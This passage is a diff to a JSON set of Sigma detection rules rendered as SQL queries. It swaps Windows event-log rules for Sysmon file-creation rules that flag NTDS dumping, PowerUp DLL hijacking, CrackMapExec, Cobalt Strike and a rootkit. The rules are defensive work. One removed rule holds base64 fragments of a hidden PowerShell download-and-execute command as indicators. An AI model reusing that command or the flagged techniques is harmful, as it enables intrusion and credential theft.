AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_rdp.yml" - }, - { - "title": "NTLM Logon", - "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", - "status": "experimental", - "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "falsepositives": [ - "Legacy hosts" - ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_auth.yml" - }, - { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", - "status": "test", - "description": "Detects common NTLM brute force device names", - "author": "Jerry Shockley '@jsh0x'", "tags": [ "attack.credential_access", - "attack.t1110" - ], - "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" - ], - "filename": "win_susp_ntlm_brute_force.yml" - }, - { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", - "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" - ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" - }, - { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", - "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", - "tags": [ - "attack.lateral_movement", - "attack.t1210" - ], - "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" - ], - "filename": "win_exchange_cve_2021_42321.yml" - }, - { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", - "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", - "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "status": "experimental", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Any powershell script that creates bat files" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", - "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ - "attack.lateral_movement", - "attack.t1021.004" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate administrator activity" + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + "filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "TeamViewer Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects the creation of log files during a TeamViewer remote session", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate uses of TeamViewer in an organisation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - "filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Windows Defender Threat Detection Disabled - Service", - "id": "6c0a7755-6d31-44fa-80e1-133e57752680", - "status": "stable", - "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", - "author": "Ján Trenčanský, frack113", + "title": "Dynamic CSharp Compile Artefact", + "id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "status": "test", + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027.004" ], "falsepositives": [ - "Administrator actions", - "Auto updates of Windows Defender causes restarts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 'stopped')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.cmdline' ESCAPE '\\')" ], - "filename": "win_system_defender_disabled.yml" + "filename": "file_event_win_csharp_compile_artefact.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename 